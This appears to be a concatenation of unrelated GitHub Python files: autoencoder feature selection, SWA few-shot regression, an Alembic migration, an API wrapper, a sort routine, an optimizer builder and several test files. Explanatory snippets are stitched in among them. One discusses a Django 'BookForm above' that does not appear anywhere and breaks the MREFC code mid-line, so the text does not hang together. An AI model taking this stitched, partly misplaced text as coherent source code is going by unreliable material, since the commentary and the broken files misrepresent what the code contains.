n,d=x_train.shape\r\n print(n,d)\r\n \r\n remain_idx = list(set(list(range(d))))\r\n \r\n input_dim = Input(shape = (d, ))\r\n encoding_dim = 300\r\n encoded = Dense(encoding_dim, activation = 'sigmoid')(input_dim)\r\n decoded = Dense(d, activation = 'sigmoid')(encoded)\r\n autoencoder = Model(input = input_dim, output = decoded)\r\n autoencoder.compile(optimizer = 'adadelta', loss = 'mse')\r\n autoencoder.fit(x_train, x_train, nb_epoch = 20, batch_size = 128, shuffle = True, validation_data = (x_test, x_test),verbose=0)\r\n auto_acc_list = [] \r\n x_train_auto = x_train\r\n \r\n #remove feat_idx 特征,记录其cost\r\n 
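One sharp edge in the `BookForm` above: `choices=author.objects.all().values_list('id', 'name')` is evaluated once, at module import time, so rows added to `author` afterwards never appear in the form. A sketch of the usual fixes — this is not the project's code; it reuses the same model imports as the form module:

from django import forms
from django.forms import widgets
from .models import author  # same relative import as the module above

class BookFormLazy(forms.Form):
    # queryset is re-evaluated each time the form is instantiated/rendered:
    author = forms.ModelMultipleChoiceField(
        queryset=author.objects.all(),
        widget=widgets.SelectMultiple(attrs={'id': 'demo-cs-multiselect'}),
    )
    # ChoiceField also accepts a callable, deferring evaluation the same way:
    status = forms.ChoiceField(choices=lambda: [(1, '出版'), (2, '未出版')])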
for feat_idx in range(d):\r\n x_train = x_train_auto\r\n x_train = x_train.transpose()\r\n new_x_train = np.append(x_train[:feat_idx], np.full((1, x_train.shape[1]), np.mean(x_train[feat_idx])), axis=0)\r\n x_train = np.append(new_x_train, x_train[feat_idx+1:], axis=0)\r\n x_train = x_train.transpose()\r\n x_train_encoded = autoencoder.predict(x_train,verbose=0)\r\n auto_cost = x_train_encoded - x_train_auto\r\n auto_cost = auto_cost ** 2\r\n auto_cost = sum(sum(auto_cost))\r\n \r\n #取出当前feat_idx在 原特征集中的 index\r\n index=remain_idx[feat_idx]\r\n auto_acc_list.append((index, auto_cost))\r\n \r\n cost_array = [auto_acc[1] for auto_acc in auto_acc_list]\r\n cost_array = np.array(cost_array)\r\n cost_array = (cost_array - min(cost_array))/ (max(cost_array) - min(cost_array))\r\n for auto_index in range(len(auto_acc_list)):\r\n auto_acc_list[auto_index] = (auto_acc_list[auto_index][0], cost_array[auto_index])\r\n auto_acc_list.sort(key=lambda x: x[1])\r\n #np.save('./selected_feature/selected_fea_AE_cost_scaler.npy',auto_acc_list) \r\n\r\n #auto_acc_list=np.load('./selected_feature/selected_fea_AE_cost_scaler.npy')\r\n z=0\r\n auto_acc_list1=np.asarray(auto_acc_list)\r\n auto_acc_list=list(auto_acc_list1[np.argsort(-auto_acc_list1[:,1])])\r\n print(auto_acc_list)\r\n #auto_acc_list.sort(key=lambda x: -x[1])\r\n cost_list=[i[1] for i in auto_acc_list]\r\n auto_sum=np.sum(cost_list)\r\n r=0.9\r\n for i in range(d):\r\n #threshold=1-(np.sum(cost_list[:i])/auto_sum)\r\n threshold=(np.sum(cost_list[:i])/auto_sum)\r\n if(threshold>r):\r\n z=i\r\n print(threshold)\r\n break\r\n print('re selected feature : ',z)\r\n final_index=[int(i[0]) for i in auto_acc_list][:z]\r\n #np.save('./selected_feature/re_selected_index.npy',final_index)\r\n print()\r\n time_end=time.time()\r\n print('total time:',time_end-time_s)\r\n return final_index\r\n\r\ndef cosine_dis(x,y):\r\n s=(np.linalg.norm(x)*np.linalg.norm(y))\r\n if(s==0):\r\n return 0\r\n else:\r\n return np.dot(x,y)/s\r\n\r\n\r\n#non-local distances\r\ndef cosine_dis_nonlocal(x,y):\r\n s=(np.linalg.norm(x)*np.linalg.norm(y))\r\n if(s==0):\r\n return 0\r\n else:\r\n if(np.dot(x,y)==0):\r\n return 0\r\n else:\r\n return 1/(np.dot(x,y)/s)\r\n\r\ndef knn_graph_local(X,k):\r\n d,n=np.shape(X)\r\n A=skn.kneighbors_graph(X.transpose(),n_neighbors=k,mode='distance',metric=cosine_dis,include_self=None)\r\n A=A.toarray()\r\n D=np.zeros([n,n])\r\n for i in range(n):\r\n D[i,i]=np.sum(A[i,:])\r\n L=D-A\r\n return L\r\ndef knn_graph_nonlocal(X,k):\r\n d,n=np.shape(X)\r\n A=skn.kneighbors_graph(X.transpose(),n_neighbors=k,mode='distance',metric=cosine_dis_nonlocal,include_self=None)\r\n A=A.power(-1)\r\n A=A.toarray()\r\n D=np.zeros([n,n])\r\n for i in range(n):\r\n D[i,i]=np.sum(A[i,:])\r\n L=D-A\r\n return L\r\n\r\ndef xavier_init(fan_in,fan_out,constant=1):\r\n low=-constant*np.sqrt(6.0/(fan_in+fan_out))\r\n high=constant*np.sqrt(6.0/(fan_in+fan_out))\r\n return np.random.uniform(low=low,high=high,size=(fan_in,fan_out))\r\n\r\ndef y_encode(W1,b1,x,m):\r\n return 1/(1+np.exp(-(np.dot(W1,x).reshape([m,1])+b1)))\r\n\r\ndef Xre_decode(W2,b2,y,d):\r\n return 1/(1+np.exp(-(np.dot(W2,y).reshape([d,1])+b2)))\r\n\r\ndef sigmid(x):\r\n return 1/(1+np.exp(-x))\r\n\r\ndef objective_opt(X,m,gam,lam,bate,k):\r\n d,n=np.shape(X) # !!! 
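The graph terms built by `knn_graph_local`/`knn_graph_nonlocal` above enter the objective through traces of the form tr(Y L Yᵀ), which is a smoothness penalty because of the identity tr(Y L Yᵀ) = ½ Σᵢⱼ Aᵢⱼ‖yᵢ − yⱼ‖². A quick numeric check of that identity on toy data — note it assumes a symmetric affinity, whereas the kNN graphs above are not explicitly symmetrized:

import numpy as np

rng = np.random.default_rng(0)
n, m = 5, 3
A = rng.random((n, n))
A = (A + A.T) / 2.0                             # symmetric affinity
np.fill_diagonal(A, 0.0)
L = np.diag(A.sum(axis=1)) - A                  # L = D - A, as in the functions above
Y = rng.random((m, n))                          # columns are samples

trace_form = np.trace(Y @ L @ Y.T)
pair_form = 0.5 * sum(A[i, j] * np.linalg.norm(Y[:, i] - Y[:, j]) ** 2
                      for i in range(n) for j in range(n))
assert np.isclose(trace_form, pair_form)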
row is feature column is the number of sample \r\n print(n,d)\r\n e=0.0001\r\n max_iteration=300\r\n diff=0.00001\r\n fun_diff=1\r\n iteration=0\r\n prior_fun=10000\r\n \r\n W1=xavier_init(m,d)\r\n W2=xavier_init(d,m)\r\n b1=xavier_init(m,1)\r\n b2=xavier_init(d,1)\r\n \r\n Y=np.zeros([m,n])\r\n Xre=np.zeros([d,n])\r\n U=np.eye(d)\r\n #L=knn_graph(X,k)\r\n L1=knn_graph_local(X,k)\r\n Ln=knn_graph_nonlocal(X,k)\r\n \r\n score_index=0\r\n score_result=np.zeros((max_iteration+1,1))\r\n \r\n #stop condition:(1) max iteration (2)the difference between two iteration of obecjive_fun less than threshold\r\n while((iteration<=max_iteration)and(fun_diff>=diff)):\r\n for i in range(n):\r\n Y[:,i]=y_encode(W1,b1,X[:,i],m).reshape(m,)\r\n Xre[:,i]=Xre_decode(W2,b2,Y[:,i],d).reshape(d,)\r\n \r\n #objective function\r\n L_fun=(1/(2*n))*np.power(np.linalg.norm((X-Xre),ord='fro'),2)\r\n R_fun=lam*np.linalg.norm( np.linalg.norm(W1,axis=0),ord=1 ) #先对列求2范数,再求1范数\r\n G_fun=gam*np.ndarray.trace( np.dot(np.dot(Y,L1), Y.transpose()) ) /\\\r\n (np.ndarray.trace( np.dot(np.dot(Y,Ln), Y.transpose()) ))\r\n W_fun=bate*(np.linalg.norm(W1,ord='fro')+np.linalg.norm(W2,ord='fro')+np.linalg.norm(b1,ord='fro')+np.linalg.norm(b2,ord='fro'))\r\n F_fun=L_fun+R_fun+G_fun+W_fun\r\n \r\n fun_diff=abs(prior_fun-F_fun)\r\n prior_fun=F_fun\r\n \r\n \r\n delta3=np.multiply( np.multiply( (Xre-X),Xre ) , (np.ones([d,n])-Xre) )\r\n delta2=np.multiply( np.multiply( np.dot(W2.transpose(),delta3) ,Y) ,(np.ones([m,n])-Y) )\r\n \r\n #compute U matrix\r\n for i in range(d):\r\n nm=np.linalg.norm(W1[:,i])\r\n if(nm==0):\r\n U[i,i]=0\r\n else:\r\n U[i,i]=1/(nm+e)\r\n \r\n #the partial of F_fun \r\n part1=np.dot(Y,L1)/ (np.ndarray.trace( np.dot(np.dot(Y,Ln), Y.transpose()) ))\r\n part2=np.dot(Y,Ln)/ np.power((np.ndarray.trace( np.dot(np.dot(Y,Ln), Y.transpose()) )) ,2)\r\n part=part1-part2\r\n W1_partial=(1/n)*np.dot(delta2,X.transpose())+lam*np.dot(W1,U)+\\\r\n 2*gam*np.dot( np.multiply(np.multiply(part,Y),(np.ones([m,n])-Y)) ,X.transpose()) + bate*W1\r\n W2_partial=(1/n)*np.dot(delta3,Y.transpose())+bate*W2\r\n b1_partial=(1/n)*np.dot(delta2,np.ones([n,1]))+\\\r\n 2*gam*np.dot( np.multiply(np.multiply(part,Y),(np.ones([m,n])-Y)) ,np.ones([n,1]))+bate*b1\r\n b2_partial=(1/n)*np.dot(delta3,np.ones([n,1]))+bate*b2\r\n \r\n W1=W1-0.1*W1_partial\r\n W2=W2-0.1*W2_partial\r\n b1=b1-0.1*b1_partial\r\n b2=b2-0.1*b2_partial\r\n \r\n print(iteration,F_fun,fun_diff)\r\n score_result[score_index]=F_fun\r\n score_index+=1\r\n iteration+=1\r\n #print(W1)\r\n score=np.zeros([d,])\r\n for i in range(d):\r\n score[i]=np.linalg.norm(W1[:,i])\r\n index=np.argsort(score)\r\n #index_fin=(index+1) #index+1\r\n savemat('iteration',{'score':score_result})\r\n return index\r\n\r\ndef fc_measure(selected_index,x_train):\r\n x_train=x_train.transpose()[selected_index,:] #!!!!\r\n print(x_train.shape)\r\n final_feature=objective_opt(x_train,m=300,lam=0.01,gam=0.005,bate=0.01,k=5)\r\n selected_index=np.asarray(selected_index)\r\n index=selected_index[final_feature]\r\n #savepath='./final_index/result_k(5)m(200)_iter(300)_a(0.1).npy'\r\n #np.save(savepath,index) \r\n\r\nif __name__=='__main__':\r\n (x_train, y_train), (x_test, y_test) = load_data()\r\n x_train = x_train.reshape(x_train.shape[0], 784)\r\n x_test = x_test.reshape(x_test.shape[0], 784)\r\n # preprocess the data\r\n x_train = x_train.astype('float32')[:10000,:]\r\n x_test = x_test.astype('float32')\r\n x_train /= 255\r\n x_test /= 255\r\n print('x_train shape:', x_train.shape)\r\n print(x_train.shape[0], 
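The `lam*np.dot(W1, U)` term in `W1_partial` above is the (sub)gradient of the ℓ2,1 penalty `R_fun`: with column norms ‖wᵢ‖, ∂‖W‖₂,₁/∂wᵢ = wᵢ/‖wᵢ‖, i.e. W·diag(1/‖wᵢ‖), and `U` is exactly that diagonal with an ε guard (the code uses e = 1e-4). A standalone sanity check with a smaller ε:

import numpy as np

def l21_norm(W):                        # R_fun's penalty: sum of column 2-norms
    return np.linalg.norm(W, axis=0).sum()

def l21_subgradient(W, eps=1e-8):       # equals W @ U with U_ii = 1/(||w_i|| + eps)
    return W / (np.linalg.norm(W, axis=0) + eps)

W = np.random.default_rng(1).normal(size=(3, 5))
g = l21_subgradient(W)
h = 1e-6
W2 = W.copy()
W2[0, 0] += h
# finite-difference check on one entry:
assert abs((l21_norm(W2) - l21_norm(W)) / h - g[0, 0]) < 1e-4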
'train samples')\r\n print(x_test.shape[0], 'test samples') \r\n '''\r\n final_index=np.load('./selected_feature/re_selected_index.npy')\r\n selected_index=final_index\r\n '''\r\n selected_index=re_measure(x_train,x_test)\r\n fc_measure(selected_index,x_train)","repo_name":"Layla6/MREFC","sub_path":"MREFC.py","file_name":"MREFC.py","file_ext":"py","file_size_in_byte":9045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70416922042","text":"# %%\nimport os\nimport sys\nimport argparse\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom torch.optim.swa_utils import AveragedModel, SWALR\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom tqdm import tqdm\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.linear_model import BayesianRidge\nfrom models.nn_regression import RegressionNN\n\nplt.style.use('ggplot')\nmatplotlib.rcParams['figure.dpi'] = 200\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('argument for training')\n parser.add_argument('--activation_function', type=str, default='erf', help='activation function name')\n parser.add_argument('--trial', type=str, default='1', help='the experiment id')\n args = parser.parse_args()\n\n # %%\n model_save_root = './pretrained_models/sin_{}'.format(\n args.activation_function)\n if not os.path.isdir(model_save_root):\n os.makedirs(model_save_root)\n model_path = os.path.join(model_save_root, 'sin_model_{}.pth'.format(args.trial))\n swa_model_path = os.path.join(model_save_root, 'sin_swa_model_{}.pth'.format(args.trial))\n\n # %%\n sin_data = torch.load('./data/regression/sin_data_few_shot.pt')\n x_train = sin_data['x_train']\n x_test = sin_data['x_test']\n y_train = sin_data['y_train']\n y_test = sin_data['y_test']\n y_true_train = sin_data['y_true_train']\n y_true_test = sin_data['y_true_test']\n\n x_train, x_test, y_train = x_train.to(device), x_test.to(device), y_train.to(device)\n\n # %%\n model = RegressionNN(input_dim=1, emb_size=40, hidden_size=40, output_dim=500,\n activation_function=args.activation_function)\n model.train()\n model = model.to(device)\n # Use the adam optimizer\n optimizer = torch.optim.SGD(model.parameters(), lr=0.001, momentum=0.9, weight_decay=1e-4)\n swa_model = AveragedModel(model)\n swa_model = swa_model.to(device)\n swa_scheduler = SWALR(optimizer, swa_lr=0.05)\n\n new_model = RegressionNN(input_dim=1, emb_size=40, hidden_size=40, output_dim=500,\n activation_function=args.activation_function)\n new_model = new_model.to(device)\n new_swa_model = AveragedModel(new_model)\n new_swa_mode = new_swa_model.to(device)\n\n # %%\n batch_size = 64\n training_iter = 100000\n swa_start = 80000\n p_bar = tqdm(total=training_iter)\n p_bar.set_description(f'Begin training')\n for i in range(training_iter):\n idx = torch.randperm(len(x_train))[:batch_size]\n mini_batch_x, mini_batch_y = x_train[idx], y_train[idx]\n optimizer.zero_grad()\n output = model(mini_batch_x)\n loss = F.mse_loss(output, mini_batch_y)\n loss.backward()\n # print('Iter %d/%d - Loss: %.3f' % (i + 1, training_iter, loss.item()))\n optimizer.step()\n\n if i == swa_start:\n torch.save(model.state_dict(), model_path)\n\n if i >= swa_start:\n swa_model.update_parameters(model)\n swa_scheduler.step()\n\n desc = f'iter {i + 1} - loss {loss.item():.4f}'\n p_bar.set_description(desc)\n p_bar.update(1)\n\n p_bar.refresh()\n p_bar.close()\n\n 
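The training loop above follows the standard PyTorch SWA recipe; here it is isolated with placeholder data so the moving parts are visible (`swa_start` mirrors the script, the model and tensors are dummies):

import torch
from torch.optim.swa_utils import AveragedModel, SWALR

model = torch.nn.Linear(10, 1)
optimizer = torch.optim.SGD(model.parameters(), lr=0.01, momentum=0.9)
swa_model = AveragedModel(model)
swa_scheduler = SWALR(optimizer, swa_lr=0.05)
swa_start = 80

for step in range(100):
    x = torch.randn(8, 10)
    loss = torch.nn.functional.mse_loss(model(x), torch.zeros(8, 1))
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()
    if step >= swa_start:
        swa_model.update_parameters(model)   # running average of the weights
        swa_scheduler.step()                 # hold the lr at swa_lr

# Nets with BatchNorm additionally need
# torch.optim.swa_utils.update_bn(train_loader, swa_model) before evaluation.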
torch.save(swa_model.state_dict(), swa_model_path)\n\n # %%\n new_model.load_state_dict(torch.load(model_path))\n new_swa_model.load_state_dict(torch.load(swa_model_path))\n new_model.eval()\n new_swa_model.eval()\n all_mse = []\n all_mse_swa = []\n for task_id in range(500):\n n_shots = 10\n idx = torch.randperm(len(x_test))\n support_idx, _ = torch.sort(idx[:n_shots])\n query_idx, _ = torch.sort(idx[n_shots:])\n x_support = x_test[support_idx]\n y_support = y_test[support_idx][:, task_id]\n x_query = x_test[query_idx]\n y_query = y_test[query_idx][:, task_id]\n y_true_query = y_true_test[query_idx][:, task_id]\n\n feature_support = new_model.extract_feature(x_support)\n feature_query = new_model.extract_feature(x_query)\n feature_support, feature_query = feature_support.detach().cpu().numpy(), feature_query.detach().cpu().numpy()\n feature_support_swa = new_swa_model.module.extract_feature(x_support)\n feature_query_swa = new_swa_model.module.extract_feature(x_query)\n feature_support_swa = feature_support_swa.detach().cpu().numpy()\n feature_query_swa = feature_query_swa.detach().cpu().numpy()\n y_support, y_query = y_support.cpu().numpy(), y_query.cpu().numpy()\n\n \"\"\"\n clf = Ridge(alpha=1.0)\n clf.fit(feature_support, y_support)\n pred_y = clf.predict(feature_query)\n mse = mean_squared_error(y_query, pred_y)\n all_mse.append(mse)\n\n clf_swa = Ridge(alpha=1.0)\n clf_swa.fit(feature_support_swa, y_support)\n pred_y_swa = clf_swa.predict(feature_query_swa)\n mse_swa = mean_squared_error(y_query, pred_y_swa)\n all_mse_swa.append(mse_swa)\n \"\"\"\n\n clf = BayesianRidge(tol=1e-6, alpha_init=1.0, lambda_init=0.01)\n clf.fit(feature_support, y_support)\n pred_y, std_y = clf.predict(feature_query, return_std=True)\n mse = mean_squared_error(y_query, pred_y)\n all_mse.append(mse)\n\n clf_swa = BayesianRidge(tol=1e-6, alpha_init=1.0, lambda_init=0.01)\n clf_swa.fit(feature_support_swa, y_support)\n pred_y_swa, std_y_swa = clf_swa.predict(feature_query_swa, return_std=True)\n mse_swa = mean_squared_error(y_query, pred_y_swa)\n all_mse_swa.append(mse_swa)\n\n\n # %%\n mse_all_np = np.array(all_mse)\n print('SGD')\n print('Mean MSE: ', mse_all_np.mean())\n print('MSE std: ', mse_all_np.std())\n\n mse_swa_all_np = np.array(all_mse_swa)\n print('SWA')\n print('Mean MSE: ', mse_swa_all_np.mean())\n print('MSE std: ', mse_swa_all_np.std())\n\n\n\n# %%\nfig, ax = plt.subplots()\nax.plot(x_support.cpu(), y_support, 'kx', label='few-shot train')\nax.plot(x_test.cpu(), y_true_test[:, -1], label='true function')\nax.plot(x_query.cpu(), pred_y, '.', label='predicted')\nax.legend()\nplt.show()\n","repo_name":"alexalex222/few_shot_swa_public","sub_path":"nn_multitask_swa.py","file_name":"nn_multitask_swa.py","file_ext":"py","file_size_in_byte":6109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40164310226","text":"\"\"\"empty message\n\nRevision ID: 29999e556a9a\nRevises: None\nCreate Date: 2016-04-01 09:43:11.377387\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '29999e556a9a'\ndown_revision = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('users')\n op.drop_table('posts')\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
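The few-shot head above drops the commented-out plain `Ridge` in favour of `BayesianRidge`, which also returns a predictive standard deviation. The pattern in isolation, on synthetic support/query features (all data here is made up):

import numpy as np
from sklearn.linear_model import BayesianRidge
from sklearn.metrics import mean_squared_error

rng = np.random.default_rng(0)
w = rng.normal(size=40)                              # hidden linear task
feat_support = rng.normal(size=(10, 40))             # 10-shot support features
y_support = feat_support @ w + 0.1 * rng.normal(size=10)
feat_query = rng.normal(size=(50, 40))
y_query = feat_query @ w

clf = BayesianRidge(tol=1e-6, alpha_init=1.0, lambda_init=0.01)
clf.fit(feat_support, y_support)
pred, std = clf.predict(feat_query, return_std=True)  # mean and uncertainty
print(mean_squared_error(y_query, pred), std.mean())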
###\n op.create_table('posts',\n sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('title', sa.VARCHAR(length=20), nullable=False),\n sa.Column('description', sa.VARCHAR(), nullable=False),\n sa.Column('user_id', sa.INTEGER(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], [u'user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('users',\n sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('name', sa.TEXT(), nullable=False),\n sa.Column('email', sa.CHAR(length=50), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n ### end Alembic commands ###\n","repo_name":"Harrisonkamau/bc-6-ideabox","sub_path":"migrations/versions/29999e556a9a_.py","file_name":"29999e556a9a_.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36907747735","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\n\nfrom ._http import request\n\nif TYPE_CHECKING:\n from typing import List\n\n from .types.topics import Topic\n\n__all__ = (\"get_topics_nearby\",)\n\n\nasync def get_topics_nearby(\n *,\n authorisation_token: str,\n lattitude: float,\n longitude: float,\n) -> List[Topic]:\n \"\"\"\n Gets the topics nearby the lattitude and longitude provided.\n\n Parameters\n ----------\n authorisation_token: :class:`str`\n The authorisation token to send requests with.\n lattitude: :class:`float`\n The lattitude to get the topics for.\n\n .. note::\n This is known as ``lat`` on the API.\n\n longitude: :class:`float`\n The longitude to get the topics for.\n\n .. note::\n This is known as ``lon`` on the API.\n\n Returns\n -------\n List[:class:`.Topic`]\n The topics nearby the lattitude and longitude provided.\n\n .. versionadded:: 1.0\n \"\"\"\n data = await request(\n f\"/topics_nearby?lat={lattitude}&lon={longitude}\",\n authorisation_token=authorisation_token,\n )\n return data[\"topics\"]","repo_name":"spifory/shedding.py","sub_path":"shedding/topics.py","file_name":"topics.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"30947022618","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/3/30 20:05\n# @Author : lihanhan\n# @Email : demo1li@163.com\n# @File : 简单选择排序.py\ndef select_sort(items, comp=lambda x, y: x < y):\n \"\"\"简单选择排序\"\"\"\n items = items[:]\n for i in range(len(items) - 1):\n min_index = i\n for j in range(i + 1, len(items)):\n if comp(items[j], items[min_index]):\n min_index = j\n items[i], items[min_index] = items[min_index], items[i]\n return items\n\nprint(select_sort([1,5,6,9,8,4,4,5,8,10,36]))","repo_name":"createnewdemo/pycharm_pracise1","sub_path":"基础加强/数据结构算法/简单选择排序.py","file_name":"简单选择排序.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"32479195356","text":"import composer.optim\nimport torch.optim\n\n\ndef build_optimizer(config, model):\n \"\"\"\n Build optimizer, set weight decay of normalization to 0 by default.\n \"\"\"\n skip = {}\n\n if hasattr(model, \"no_weight_decay\"):\n skip = model.no_weight_decay()\n\n parameters = set_weight_decay(model, skip)\n\n name = config.optim.name.lower()\n if name == \"sgd\":\n return torch.optim.SGD(\n parameters,\n momentum=config.optim.momentum,\n nesterov=True,\n lr=config.optim.lr,\n weight_decay=config.optim.weight_decay,\n )\n elif name == \"adamw\":\n 
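A hypothetical call site for the `get_topics_nearby` coroutine above — the token and coordinates are dummies, and the import path is an assumption based on the record's `shedding/topics.py` location:

import asyncio
from shedding.topics import get_topics_nearby   # assumed module path

async def main():
    topics = await get_topics_nearby(
        authorisation_token='DUMMY-TOKEN',
        lattitude=-26.2041,     # keyword spelling matches the signature above
        longitude=28.0473,
    )
    for topic in topics:
        print(topic)

asyncio.run(main())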
return torch.optim.AdamW(\n parameters,\n lr=config.optim.lr,\n weight_decay=config.optim.weight_decay,\n )\n elif name == \"decoupledadamw\":\n return composer.optim.DecoupledAdamW(\n parameters,\n lr=config.optim.lr,\n weight_decay=config.optim.weight_decay,\n )\n elif name == \"decoupledsgdw\":\n return composer.optim.DecoupledSGDW(\n parameters,\n lr=config.optim.lr,\n momentum=config.optim.momentum,\n weight_decay=config.optim.weight_decay,\n )\n else:\n raise ValueError(name)\n\n\ndef set_weight_decay(model, skip_list=()):\n has_decay = []\n no_decay = []\n\n for name, param in model.named_parameters():\n if len(param.shape) == 1 or name.endswith(\".bias\") or (name in skip_list):\n no_decay.append(param)\n else:\n has_decay.append(param)\n\n return [{\"params\": has_decay}, {\"params\": no_decay, \"weight_decay\": 0.0}]\n","repo_name":"samuelstevens/hierarchical-vision","sub_path":"optim.py","file_name":"optim.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43863315710","text":"import pytest\nimport os\n\nfrom devassistant import utils\n\nclass TestFindFileInLoadDirs(object):\n fixtures = os.path.join(os.path.dirname(__file__), 'fixtures')\n\n def test_find_ok(self):\n assert utils.find_file_in_load_dirs('files/jinja_template.py') == \\\n os.path.join(self.fixtures, 'files', 'jinja_template.py')\n\n def test_find_not_there(self):\n assert utils.find_file_in_load_dirs('files/does_not_exist') is None\n\n\nclass TestStripPrefix(object):\n\n @pytest.mark.parametrize(('inp', 'prefix', 'out'), [\n ('foobar', 'foo', 'bar'),\n ('foobar', 'bar', 'foobar'),\n ('foobar', 'foobar', ''),\n ('foo', 'foobar', 'foo'),\n ('foo', str(1), 'foo'),\n # Should not strip regex\n ('foobar', 'foo|bar', 'foobar'),\n ('foobar', '[fo]*', 'foobar'),\n ('foobar', '.*', 'foobar'),\n ('foobar', 'fo.', 'foobar'),\n ])\n def test_strip_noregex(self, inp, prefix, out):\n assert utils.strip_prefix(inp, prefix) == out\n\n @pytest.mark.parametrize(('inp', 'prefix', 'out'), [\n ('foobar', 'foo|bar', 'bar'),\n ('foobar', '[fo]*', 'bar'),\n ('foobar', '.*', ''),\n ('foobar', 'fo.', 'bar'),\n ])\n def test_strip_regex(self, inp, prefix, out):\n assert utils.strip_prefix(inp, prefix, regex=True) == out\n\n @pytest.mark.parametrize(('inp', 'prefix'), [\n (1, 'foo'),\n (object(), object()),\n ('foo', None)\n ])\n def test_fails(self, inp, prefix):\n with pytest.raises(TypeError) as e:\n utils.strip_prefix(inp, prefix)\n\n\nclass TestStripSuffix(object):\n\n @pytest.mark.parametrize(('inp', 'suffix', 'out'), [\n ('foobar', 'bar', 'foo'),\n ('foobar', 'r', 'fooba'),\n ('foobar', 'foobar', ''),\n ('foo', 'foobar', 'foo'),\n ('foo', str(1), 'foo'),\n # Should not strip regex\n ('foobar', 'foo|bar', 'foobar'),\n ('foobar', '[ar]*', 'foobar'),\n ('foobar', '.*', 'foobar'),\n ('foobar', '.bar', 'foobar'),\n ])\n def test_strip_noregex(self, inp, suffix, out):\n assert utils.strip_suffix(inp, suffix) == out\n\n @pytest.mark.parametrize(('inp', 'prefix', 'out'), [\n ('foobar', 'foo|bar', 'foo'),\n ('foobar', '[ar]*', 'foob'),\n ('foobar', '.*', ''),\n ('foobar', '.bar', 'fo'),\n ])\n def test_strip_regex(self, inp, prefix, out):\n assert utils.strip_suffix(inp, prefix, regex=True) == out\n\n @pytest.mark.parametrize(('inp', 'suffix'), [\n (1, 'foo'),\n (object(), object()),\n ('foo', None)\n ])\n def test_fails(self, inp, suffix):\n with pytest.raises(TypeError) as e:\n utils.strip_suffix(inp, 
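Exercising `build_optimizer`/`set_weight_decay` above with a throwaway config — the nested attribute access is mimicked with `SimpleNamespace` (the real project presumably has its own config object), and `name='sgd'` avoids needing composer installed:

import types
import torch

model = torch.nn.Sequential(torch.nn.Linear(4, 4), torch.nn.LayerNorm(4))
config = types.SimpleNamespace(optim=types.SimpleNamespace(
    name='sgd', lr=1e-3, weight_decay=0.05, momentum=0.9))
opt = build_optimizer(config, model)

# LayerNorm weights and all biases (1-D shape or name ending in ".bias")
# land in the zero-decay group:
decay, no_decay = set_weight_decay(model)
print(len(decay['params']), len(no_decay['params']))   # 1 3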
suffix)\n","repo_name":"devassistant/devassistant","sub_path":"test/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"40"} +{"seq_id":"2350886003","text":"import random\n\nfrom pippi import dsp\n\nharp = dsp.read('harp1.wav')\n\nout = dsp.silence(1)\n\nfor grain in harp.grains(100, 1000):\n grain = grain.env('blackman') * random.random()\n out.dub(grain, random.randint(0, 44100))\n\nout.write('harpy.wav')\n","repo_name":"hecanjog/sketches","sub_path":"harps.py","file_name":"harps.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25057428937","text":"import marieclancyProject1\nimport pytest\n\n\n# Test to check if the retrieved list has more than 100 items.\ndef test_get_jobs():\n jobs = marieclancyProject1.get_jobs()\n assert len(jobs) > 100\n assert type(jobs[1]) == dict\n\n\n# Test to check if the stackoverflow list returns more than 350 items.\ndef test_get_stack_jobs():\n jobs = marieclancyProject1.get_data_from_stackoverflow()\n assert len(jobs) > 350\n assert type(jobs[2]) == dict\n\n\ndef test_if_data_in_database_from_stack_over_flow():\n existingLocation = \"Kowloon,Hong Kong\"\n conn, cursor = marieclancyProject1.open_db(\"test.sqlite\")\n marieclancyProject1.setup_db(cursor, conn)\n jobs = marieclancyProject1.get_data_from_stackoverflow()\n for job in jobs:\n marieclancyProject1.insert_to_database(cursor, conn, job)\n cursor.execute(\"SELECT * FROM jobs WHERE jobs.location = ?\", (existingLocation,))\n assert cursor.fetchone()\n marieclancyProject1.close_db(conn)\n\n\ndef test_insert_to_database():\n jobs = marieclancyProject1.get_jobs()\n existingTitle = \"Web Full Stack Engineer\"\n conn, cursor = marieclancyProject1.open_db(\"test.sqlite\")\n marieclancyProject1.setup_db(cursor, conn)\n for job in jobs:\n marieclancyProject1.insert_to_database(cursor, conn, job)\n cursor.execute(\"SELECT * FROM jobs WHERE jobs.title = ?\", (existingTitle,))\n assert cursor.fetchone()\n marieclancyProject1.close_db(conn)\n\n\n# Test to check if the function actually writes a file with the correct data.\ndef test_write_file():\n jobs = 